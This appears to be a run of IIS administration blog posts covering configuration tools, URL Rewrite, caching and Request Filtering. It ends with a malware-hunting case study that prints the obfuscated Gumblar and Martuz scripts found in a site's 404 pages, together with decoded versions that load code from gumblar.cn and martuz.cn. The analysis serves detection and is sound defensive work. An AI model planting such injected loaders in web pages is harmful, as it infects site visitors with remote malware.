Posts
  • CarlosAg Blog

    Managing ASP.NET Configuration Settings using IIS Manager

    • 0 Comments

    Today somebody asked a question about how to manage some ASP.NET configuration settings such as changing the trust level of the application and adding a few application settings and changing compilation settings to debug. I thought it would be trivial to search the web for an article or something that would show the features we added in IIS 7.0 to manage those, but to my surprise I was not able to find anything that would clearly show it, so I decided to write this pretty quickly for anyone that is not aware.

    image

    With the release of IIS 7.0 (included in Windows Vista and Windows Server 2008), and of course included in IIS 7.5 (Windows 7 and Windows Server 2008 R2) we added a set of features for managing some of the configuration of common ASP.NET features inside the same IIS Manager. Those features include:

    1. .NET Authorization Rules 1 – To manage the authorization rules for ASP.NET, this is particularly useful when using Classic Mode. This UI basically is to manage the system.web/authorization section in a graphical way.
    2. .NET Compilation – This exposes the settings used by the ASP.NET compilation engine, such as list of assemblies, Debug settings, VB settings (Option Strict, Option Explicit), Temp directory, etc. This UI saves all the settings in the system.web/compilation section.
    3. .NET Error Pages 1 – Allows you to manage the ASP.NET custom errors, exposing the system.web/customErrors.
    4. .NET Globalization – Allows you to manage the globalization settings such as file encoding, ui culture, etc. This modifies the section system.web/globalization
    5. .NET Providers 2 – Allows you to manage the different provider configuration for the ASP.NET providers, such as Roles, Membership and Profile. (system.web/membership, system.web/profile, system.web/roleManager, etc).
    6. .NET Users, .NET Roles and .NET Profile 2 – Configure options that track settings for ASP.NET applications. All these features uses the ASP.NET runtime configuration to allow you to manage their settings, such as adding users, roles and profile settings. (What this post is about). These does not modify configuration but instead they use the Provider configured (such as SqlMembershipProvider, SqlRoleProvider, WindowsTokenRoleProvider, etc)
    7. .NET Trust Levels, allows you to configure the security trust level policy for the application. Modifies system.web/trust section.
    8. Application Settings – Allows you to manage the name/value pair stored in the .NET appSettings section.
    9. Connection Strings – Configures the database connection strings that can be used by ASP.NET applications. Manages the connectionStrings section.
    10. Machine Key – Allows you to modify the machine key and other related settings stored in system.web/machineKey section.
    11. Pages and Controls – Allows you to modify settings from the system.web/pages section, such as Base class, Namespaces, and Controls registered.
    12. Session State – Allows you to configure the session state settings such as connection string, cookie configuration and other configuration included in system.web/sessionState.
    13. SMTP E-mail – Configure the SMTP settings such as Server, Delivery mode, or Pickup directory, included in system.net/mailSettings/smtp section.

    1 – These features are included in Windows 7 and Windows Server 2008 R2, but can be installed for Windows Vista and Windows Server 2008 when downloading the Administration Pack for IIS7.

    2 – Note, these features require hosting the ASP.NET runtime and due to technical limitations only application pools configure to run using .NET Version 2.0 will show these features. This means that if you configure your application pool to run .NET 4.0 (in IIS 7.0 and IIS 7.5) you will not see those features. As a workaround you could temporarily change the application pool to run in 2.0, make your changes and switch it back to 4.0 (of course, not recommended for production environments).

    These features are not meant to expose all the settings included in ASP.NET, and they only include configuration settings up to .NET 2.0. I should also add that IIS includes a generic configuration editor that allows you to manage a lot more configuration settings from ASP.NET, IIS, and more, in the image below you can see a lot more sections like webParts, trace, siteMap, and others:

    image

    The best thing is that you can apply the changes immediately or you can also make changes and just generate the code to automate them later using code, command line or scripts them using Javascript, Managed code, or AppCmd.exe.

    image

  • CarlosAg Blog

    IIS Admin Pack: Configuration Editor

    • 3 Comments

    Today I will be talking about one of the features included in the new IIS Admin Pack called Configuration Editor.

    Configuration Editor is an IIS Manager feature that will let you managed any configuration section available in your configuration system. Configuration Editor exposes several features from configuration that are not exposed anywhere else in IIS Manager, including:

    1. Schema Driven - Config Editor is entirely driven by the configuration schema (found in \windows\system32\inetsrv\config\schema\), this means that if you extend the configuration system creating your sections, they will be available for managing inside config editor, no need to build additional UI for them.
    2. Additional Information - Config Editor exposes more information such as the deepest place where the section is being used, or where a particular element in a collection is coming from (where is it inherited from?), etc.
    3. Script Generation - Allows you to make changes and it generates the code to automate those tasks, generating Managed Code (using Microsoft.Web.Administration), JavaScript (using AHADMIN) or Command Line (using AppCmd).
    4. Searching - Allows you to quickly perform scoped searches of the configuration system for all the sections and where they are being used, becoming a great way to get a bigger picture of the server as well as to prevent configuration locking violations and many other uses.
    5. Locking - Allows you to do advanced locking such as locking specific attributes so that they cannot be used in deeper locations, lock individual items in a collection or lock the entire section, etc.

    Please give us feedback on things you would like to see or change at the IIS Forums: http://forums.iis.net/1149.aspx

    OK, but rather than keep with more and more text, I will just show you a video on how it looks and all its features (for those of you who like text, there is a transcript below).

    Transcript:

    So I have here Windows Vista SP 1 with the IIS Admin Pack installed, in my machine I have very few applications installed but should be good to show some of the features on config editor. When entering Config Editor, first thing you will notice is that at the top you have a drop-down list that shows all the sections currently schematized and ready to be used in your system.

    Since this is sorted alphabetically, the first section that gets selected is AppSettings, for I can very easily switch between ASP.NET configuration sections, such as system.web/authentication, or the IIS configuration sections such as system.webServer/defaultDocument or the system.applicationHost/sites that contains all the sites configuration for IIS.

    As you can see the user interface displays the configuration elements and properties of the section that is selected, providing you an easy way to see every single configuration property available in the system.

    At the top you'll get a label specifying the deepest path where this section is being used relevant to your scope, so in this case its telling us that its been set in ApplicationHost.config. After that, all the elements and properties are shown in a Property Grid, that displaye elements as a collapsible set of properties. One of the interesting things is that we provide validation for the properties for example, when entering string characters in a numeric property type an error message will be displayed giving you the details of the expected types. Additionaly other benefits such as type editors, so that when editing a property of type boolean, you get the True/False drop-down, or when a property that is of type enumeration such as the LogFormat inside the SiteDefaults, you will get a drop-down list with only the list of options that are allowed for that enumeration. Same way, when editing a property of type flags such as the logExtFileFlags that contains the fields to include in the log file, you will get a multi-select drop-down list where you can select and de-select the different options. Also, you will notice that additional information is displayed as you select the different properties, giving you details of their data type as well as additional validations for those that have some, for example, the truncateSize property has specified that only a certain range is considered valid, if I type a value that is not within that range it will show this message giving me details of the problem.

    Making Changes

    Now, lets move to a simpler section so that we can show other features of the Configuration Editor. For example here in default documents, if I want to disable it I just change it to False and click Apply. As you would expect all the changes are applied and to see what changes this actually made in my system I'm going to show a Diff of the configuration that I have backed up and indeed the only change that happened in my configuration system is that it changed from true to false.

    Collection Editor

    As you will notice there is a collection in this section, all the collections are shown in an advanced collection editor that will let you see all the information of the items on it, including the ability to add, remove and clear the collection, as well as lock individual items on it. It additionally shows where each of the individual items is coming from making it easier to understand the distributed configuration.

    Another thing you will notice is that this collection editor shows some visual cues to help you deal with data, for example this little key here tells you that this property is the unique key of the collection item.

    So lets actually add a new one, for that I just need to click Add and fill the values, in this case, lets add Home.aspx as a new default document. After doing that, I can close dialog and click Apply. And lets take a look at what happened to my configuration. As you can see the new item was added. So as you can see its really easy to see and change configuration in collections.

    Script Generation

    Now, one of the interesting things that it also has is those changes that I just did, its great but sometimes I don’t want to apply them immediately but instead automate them so that I can apply them at a later time. For example, lets just change the attribute Enabled back to true, and rather than just applying the change as we did before, I want to generate the script cause probably I'm creating a provisioning script for my site and I want to include this as part of it, so just by clicking Generate Script I get this dialog that gives you the code for Managed Code using Microsoft.Web.Administration in C#, and as you can see its quite easy to read. It also gives you JavaScript code that uses a COM library that our configuration system ships called Microsoft.ApplicationHost, and just as the managed code version it just sets the value. It also gives you command line for it, so you don’t need to build code or scripts, you can just run the command line and to prove that, lets actually just run this command line. First lets show the diff again so that we see that its set to false. Now lets run the command line AppCmd which lives in Inetsrv directory. Now lets show the difference again, and as you can see it actually sets the value as expected. As you can see this will help you write scripts or code to manipulate IIS and ASP.NET settings without requiring additional knowledge.

    Locking

    Another interesting feature is locking, for example if I want to make sure that my default documents are always enabled and no one else can override them, I can go here and select the enabled attribute and click lock attribute which will prevent it from being changed in any other web.config file.

    Search Configuration

    Now, another interesting feature which is probably one of the most powerful features is the ability to search configuration so that you can see a high-level overview of the configuration system and all the web.config files on it. Just click Search Configuration. This shows me this dialog that shows me the root web.config that includes all the section that are being set on it, it also shows me applicationHost.config that includes again all the sections being used on it, as well as a location tag for a particular application that includes also some sections for it. you will notice that I also have a couple of applications that include web.config's in their folders, and sub-folders. where we can see how for example in this web.config it includes some

    one of the neat features is that you can actually click any of this nodes and it will immediately display the content of the section as well as where its coming from. For example if I click the web.config my entire web.config is displayed, if I click a specific section it only displays the content of the section. I can even click the locationPath that I'm interested and only get that particular one.

    Additionally you can easily search who is changing the authorization settings from asp.net and as easy as that you can see all the places in your server where the authorization settings are being set and quickly identify all the settings that are being used in your server. This feature is extremely useful because now, you can easily search for example default Document and make sure nobody is changing it and make sure no one else is violating the locking we just did.

    It also allows you to see the files in a flat view where it gives you all the different paths and files where each of them is coming from. You get the exact functionality, its just a different visual representation of the config.

    Schema-Driven

    Another interesting thing is that if you want to build your own sections and extend our configuration system, you can go to the schema folder and write your own configuration section, declare it using our schema notation, here I'm just defining a section named mySection, that includes an attribute called enabled of type bool and an attribute called message of type string and an attribute password of type string that should be encrypted.. Now, I just need to edit applicationHost.config to define the section so that config system knows we are going to consume it . Just by doing that, now I can go back to config editor and refresh the window, and my section is now available in the drop down, and as you would expect it displays all of the properties I defined, and I can just go ahead and set them, and I get all the locking functionality, I get all the script generation, I get all the UI validation.

    And if I apply, you will see that as expected the changes are done, the password attribute is encrypted, etc.

    So as you can see configuration editor is an extremely powerful feature that will be really useful for successfully managing the web.config's in your system.

  • CarlosAg Blog

    SEO made easy with IIS URL Rewrite 2.0 SEO templates

    • 8 Comments

    A few weeks ago my team released the version 2.0 of the URL Rewrite for IIS. URL Rewrite is probably the most powerful Rewrite engine for Web Applications. It gives you many features including Inbound Rewriting (ie. Rewrite the URL, Redirect to another URL, Abort Requests, use of Maps, and more), and in Version 2.0 it also includes Outbound Rewriting so that you can rewrite URLs or any markup as the content is being sent back even if its generated using PHP, ASP.NET or any other technology.

    It also includes a very powerful User Interface that allows you to test your regular expressions and even better it includes a set of templates for common types of Rules. Some of those rules are incredibly valuable for SEO (Search Engine Optimization) purposes. The SEO rules are:

    1. Enforce Lowercase URLs. It will make sure that every URL is used with only lower case and if not it will redirect with a 301 to the lower-case version.
    2. Enforce a Canonical Domain Name. It will help you specify what domain name you want to use for your site and it will redirect the traffic to the right host name.
    3. Append or Remove the Trailing Slash. It will make sure your request either include or not include the trailing slash depending on your preference.

    image

    For more information on the SEO Templates look at: http://learn.iis.net/page.aspx/806/seo-rule-templates/

    What is really cool is that you can use the SEO Toolkit to run it against your application and you probably will get some violations around lower-case, or canonical domains, etc. And after seeing those you can use URL Rewrite 2.0 to fix them with one click.

    I have personally used it in my Web site, try the following three URLs and all of them will be redirected to the canonical form (http://www.carlosag.net/Tools/CodeTranslator/) and you will see URL Rewrite in action:

    1. http://www.carlosag.net/Tools/CodeTranslator/
    2. http://carlosag.net/Tools/CodeTranslator/
    3. http://www.carlosag.net/Tools/CodeTranslator

    Note that at the end those templates just translate to web.config settings that become part of your application that can be XCOPY with it. This works with ASP.NET, PHP, or any other server technology including static files. Below is the output of the Canonical Host Name rule which I use on my Web site’s web.config.

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
       
    <system.webServer>
           
    <rewrite>
               
    <rules>
                   
    <rule name="CanonicalHostNameRule1">
                       
    <match url="(.*)" />
                        <
    conditions>
                           
    <add input="{HTTP_HOST}" pattern="^www\.carlosag\.net$" negate="true" />
                        </
    conditions>
                       
    <action type="Redirect" url="http://www.carlosag.net/{R:1}" />
                    </
    rule>
               
    </rules>
           
    </rewrite>
       
    </system.webServer>
    </configuration>

    There are many more features that I could talk, but for now this was just a quick SEO related post.

  • CarlosAg Blog

    Extending the TreeView in IIS 7 in Windows Vista

    • 8 Comments

    Extending the Hierarchy Tree View in InetMgr

    InetMgr exposes several extensibility points that developers can use to plug-in their own features and make them look and feel just as the built-in functionality. One of those extensibility features is the hierarchy tree view and is exposed mainly through three classes:

    1. HierarchyService. This class is the class that handles the entire hierarchy and an instance is provided by the UI and you can get a reference to it through a ServiceProvider. It is used to manipulate the tree view programmatically, exposing methods to perform actions such as Select, Delete, Refresh, etc.
    2. HierarchyInfo. This abstract class represents a node in the tree view, for example the Web Sites node, the Default Web Site's node, the connections node are examples of instances of HierarchyInfo’s. This class has properties like Text, Image and allows you to react to actions such as selection, deletion, etc. Developers extending the tree view will need to create their own derived classes to implement the behavior as explained below.
    3. c) HierarchyProvider. This abstract class is the base class for all the features that want to extend the tree view. HierarchyService will query each of the registered providers to create the treeview. Developers that wish to add their own nodes should register a HierarchyProvider through the IExtensibilityManager interface.

    To extend the Tree view to add your own set of nodes or context menu tasks, developers need to perform the following actions:

    1. Create a class that derives from HierarchyProvider and handles the GetChildren and/or GetTaskItems to provide any nodes or tasks as needed.
    2. Register the HierarchyProvider using the IExtensibilityManager, this is typically done during the Module initialization phase.
    3. 3) Handle navigation and syncronization as needed.

     

    Tasks illustrated in this walkthrough include:

    • Creating a HierarchyProvider and creating HierarchyInfo classes
    • Registering a HierarchyProvider
    • Testing the new feature
    Note:
    This walkthrough is a continuation from the previous three walkthroughs you can find on how to extend InetMgr.
    You can find the first three at:

    Task 1: Creating a HierarchyProvider

    HierarchyProvider is the base class that developers need to inherit from in order to get calls from the UI whenever a node needs to be loaded. This way they can choose to add nodes or tasks to the HierarchyInfo node that is passed as an argument.

     

    To create a HierarchyProvider
    1. Back in Microsoft Visual Studio 2005 in the ExtensibilityDemo solution, select the option Add New Item from the Project Menu. In the Add New Item dialog select the Class template and type DemoHierarchyProvider.cs as the name for the file.
    2. Change the code so that it looks as follows:
      using System;
      using 
      Microsoft.Web.Management.Client;

      namespace 
      ExtensibilityDemo {

          
      internal class DemoHierarchyProvider : HierarchyProvider {

              
      public DemoHierarchyProvider(IServiceProvider serviceProvider)
                  : 
      base(serviceProvider) {
              }

              
      public override HierarchyInfo[] GetChildren(HierarchyInfo item) {
                  
      if (item.NodeType == HierarchyInfo.ServerConnection) {
                      
      return new HierarchyInfo[] { new DemoHierarchyInfo(this) };
                  
      }

                  
      return null;
              
      }


              
      internal class DemoHierarchyInfo : HierarchyInfo {

                  
      public DemoHierarchyInfo(IServiceProvider serviceProvider)
                      : 
      base(serviceProvider) {
                  }

                  
      public override string NodeType {
                      
      get {
                          
      return "DemoHierarchyInfo";
                      
      }
                  }

                  
      public override bool SupportsChildren {
                      
      get {
                          
      return false;
                      
      }
                  }

                  
      public override string Text {
                      
      get {
                          
      return "Demo Page";
                      
      }
                  }

                  
      protected override bool OnSelected() {
                      
      return Navigate(typeof(DemoPage));
                  
      }
              }
          }
      }

    The code above creates a class derived from HierarchyProvider that implements the base GetChildren method verifying that the node that is being expanded is a ServerConnection; if that is the case it returns an instance of a DemoHierarchyInfo node that will be added to that connection. The class DemoHierarchyInfo simply specifies its NodeType (a non-localized string that identifies the type of this node), SupportsChildren (false so that the + sign is not offered in tree view) and Text (the localized text that will be displayed in the tree view). Finally it overrides the OnSelected method and performs navigation to the DemoPage as needed.

    Task 2: Registering the HierarchyProvider

    In this task we will register the hierarchy provider created in the previous task so that the HierarchyService starts calling this type to extend the tree view.

    To register the provider
    1. Back in Microsoft Visual Studio 2005, open the file DemoModule.cs, and add the following code at the end of the method to register the provider:
      IExtensibilityManager extensibilityManager =
          
      (IExtensibilityManager)GetService(typeof(IExtensibilityManager));

      extensibilityManager.RegisterExtension(
          
      typeof(HierarchyProvider),
          
      new DemoHierarchyProvider(serviceProvider));
    2. The entire code should look as follows:
      protected override void Initialize(IServiceProvider serviceProvider,
                                         ModuleInfo moduleInfo) {
          
      base.Initialize(serviceProvider, moduleInfo);

          
      IControlPanel controlPanel =
              
      (IControlPanel)GetService(typeof(IControlPanel));

          
      ModulePageInfo modulePageInfo =
           new 
      ModulePageInfo(thistypeof(DemoPage), "Demo""Demo Page");

          
      controlPanel.RegisterPage(modulePageInfo);

          
      IExtensibilityManager extensibilityManager =
              
      (IExtensibilityManager)GetService(typeof(IExtensibilityManager));

          
      extensibilityManager.RegisterExtension(
              
      typeof(HierarchyProvider),
              
      new DemoHierarchyProvider(serviceProvider));
      }

    Task 3: Testing the new feature

    To test the feature

    1. Compile everything using Build Solution from the Build Menu and run InetMgr.exe from the <Windows>\System32\InetSrv directory.
    2. Connect to localhost using the TreeView and expand the server connection node.
    3. This will show the new node underneath the connection. When you click on it, it will navigate to the demo page just as expected:

       

    4. Furthermore, the breadcrumb at the top of the UI will automatically discover it and you will be able to navigate to the page by clicking on it, as well as using the text editing and intellisense feature it provides.

       

       

     

    Next Steps

    In this lab, you learned how to extend the tree view to customize any node on it and add your own nodes to it. You can also override the GetTasks method to provide context menu tasks for existing nodes, and you can also override the SyncSelection method to customize the way synchronization of navigation works.

  • CarlosAg Blog

    Are you caching your images and scripts? IIS SEO can tell you

    • 2 Comments

    One easy way to enhance the experience of users visiting your Web site by increasing the perceived performance of navigating in your site is to reduce the number of HTTP requests that are required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into a big image, etc, but by far the simplest one of all is making sure that you cache as much as you can in the client. This will not only increase the rendering time but will also reduce load in your server and will reduce your bandwidth consumption.

    Unfortunately the different types of caches and the different ways of set it can be quite confusing and esoteric. So my recommendation is to think about one way and use that all the time, and that way is using the HTTP 1.1 Cache-Control header.

    So first of all, how do I know if my application is being well behaved and sending the right headers so browsers can cache them. You can use a network monitor or tools like Fiddler or wfetch to look at all the headers and figure out if the headers are getting sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

    Enter Site Analysis - IIS Search Optimization Toolkit

    To figure out if your images are sending the right headers you can follow the next steps:

    1. Install the IIS Search Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
    2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
    3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
      1. Is External - Equals - False -> To only include the files that are coming from your Web site.
      2. Status code - Equals - OK -> To include only successful requests
      3. Content Type Normalized - Begines With - image/ -> To include only images
      4. Headers - Not Contains - Cache-Control: -> to include the ones does not have the cache-control header specified
      5. Headers - Not Contains - Expires: -> To include only the ones that do no have the expires header
      6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

    Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="IsExternal" operator="Equals" value="False" />
        <
    expression field="StatusCode" operator="Equals" value="OK" />
        <
    expression field="ContentTypeNormalized" operator="Begins" value="image/" />
        <
    expression field="Headers" operator="NotContains" value="Cache-Control:" />
        <
    expression field="Headers" operator="NotContains" value="Expires:" />
      </
    filter>
     
    <displayFields>
       
    <field name="URL" />
        <
    field name="ContentTypeNormalized" />
        <
    field name="StatusCode" />
      </
    displayFields>
    </query>

    How do I fix it?

    In IIS 7 this is trivial to fix, you can just drop a web.config file in the same directory where your images and scripts and CSS styles specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
     
    <system.webServer>
           
    <staticContent>
               
    <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
            </
    staticContent>
     
    </system.webServer>
    </configuration>

    You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> Set Common Headers... or any of our API's using Managed code, JavaScript or your favorite language:

    http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

    Furthermore, using the same query above in the Query Builder you can Group by Directory and find the directories that really worth adding this. For that is just matter of clicking the "Group by" button and adding the URL-Directory to the Group by clauses. Not surprisingly in my case it flags the App_Themes directory where I store 8 images.

    IIS SEO

     

    Finally, what about 304's?

    One thing to note is that that even if you do not do anything most modern browsers will use conditional requests to reduce the latency if they have a copy in their cache, as an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in their cache, the browser will issue a request like this

    GET /logo.gif HTTP/1.1
    Accept: */*
    Referer: http://carlosag-client/test.htm
    Accept-Language: en-us
    User-Agent: (whatever-browser-you-are-using)
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
    If-None-Match: "01c13f951cac81:0"
    Host: carlosagdev:8080
    Connection: Keep-Alive

    Note the use of If-Modfied-Since header which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't so the server responds with a status code 304 (Not Modified)

    HTTP/1.1 304 Not Modified
    Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
    Accept-Ranges: bytes
    ETag: "01c13f951cac81:0"
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
    Date: Sun, 07 Jun 2009 06:33:51 GMT

    Even though this helps you can imagine that this still requires a whole roundtrip to the server which even though will have a short response, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display correctly the page or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).

    Summary

    To summarize, with IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that otherwise were tedious tasks. In this case I show how easy it is to find all the images that are not specifying any caching headers and you can do the same thing for scripts (if you add Content Type Normalized equals application/javascript)  or styles (Content Type Normalized Equals text/css). This way you can increase the performance of the rendering and reduce the overall bandwidth of your Web site.

  • CarlosAg Blog

    Internet Information Services (IIS) 7.0 Manager for Windows XP, 2003 and Windows Vista SP1 RC0 is available for download

    • 6 Comments

    NOTE: RTM has been released see the following blog: http://blogs.msdn.com/carlosag/archive/2008/03/04/IISManagerForWindowsXPand2003andVista.aspx 

    With the release of Windows Server 2008 RC0, in IIS we are also releasing the ability to manage the Web Server, the new FTP Server and the new modules remotely using IIS Manager 7.0.

    In the past with previous Beta we shipped similar functionality under a different name, however for the first time this is the real way we will be supporting this remote administration from different Windows versions when Windows Server 2008 final version comes along.

    The reason this release in particular is exiting is because for the first time all the UI extensibility is enabled for these platforms making it possible to build your own UI modules, install them in the server and have the clients that connect to your server automatically download the new functionality and use it as it was part of the IIS Manager release.

    Another reason this is important for us is because this is the first time we are releasing support for x64 which is something required for customers using Windows Vista 64 bit edition or any other 64 bit version of Windows.

    You can download and install them from:

    x86

    http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1524

    x64

    http://www.iis.net/downloads/default.aspx?tabid=34&i=1525&g=6

    Note: This RC0 version will not be able to connect to any other older build of Windows 2008 Server including Beta 3, so if you need to still manage Beta 3 version you will need to install the Beta 3 build of the tool which can safely live side-by-side with the RC0 build.

  • CarlosAg Blog

    IIS 7.0 Admin Pack: Request Filtering

    • 12 Comments

    My last post talked about the Technical Preview release of the IIS 7.0 Admin Pack, and how it includes 7 new features that will help you manage your IIS 7.0.

    Today I was going to start writing about more details about each feature and Bill Staples just posted something (How to (un)block directories with IIS7 web.config) that almost seems that it was planned for me to introduce one of the features in the Admin Pack, namely Request Filtering UI.

    IIS 7.0 includes a feature called Request Filtering that provides additional capabilities to secure your web server, for example it will let you filter requests that are double escaped, or filter requests that are using certain HTTP Verbs, or even block requests to specific "folders", etc. I will not go into the details on this functionality, if you want to learn more about it you can see the Request Filtering articles over http://learn.iis.net

    In his blog Bill mentions how you can easily configure Request Filtering using any text editor, such as notepad, and edit the web.config manually. That was required since we did not ship UI within IIS Manager for it due to time constraints and other things. But now as part of the Admin Pack we are releasing UI for managing the Request Filtering settings.

    Following what Bill just showed in his blog, this is the way you would do it using the new UI instead.

    1) Install IIS Admin Pack (Technical Preview)

    2) Launch IIS Manager

    3) Drill down using the Tree View to the site or application you want to change the settings for.

    4)  Enter into the new feature called Request Filtering inside the IIS category

    5) Select the Hidden Segments and choose "Add Hidden Segment" from the Task List on the right

    6) Add the item

    As you would expect the outcome is exactly as Bill explained in his blog, just an entry within you web.config, something like:

        <system.webServer>
           
    <security>
               
    <requestFiltering>
                   
    <hiddenSegments>
                       
    <add segment="log" />
                    </
    hiddenSegments>
               
    </requestFiltering>
           
    </security>
       
    </system.webServer>

    So as you can see the Request Filtering UI will help you discover some of the nice security settings that IIS 7.0 has. The following images show some of the additional settings you can configure, such as Verbs, Headers, URL Sequences, URL Length, Quey String size, etc.

  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

    img01

    I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

    Gumblar and Martuz.cn Malware on sight

    img02

    After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

    var a = "ScriptEngine", 
       
    b = "Version()+", 
       
    j = "", 
       
    u = navigator.userAgent; 
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
       
    zrvzts = "A"; 
       
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
       
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
    }

    And:

    var a="ScriptEngine",
       
    b="Version()+",
       
    j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
       
    zrvzts="A";
       
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
    }

    Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
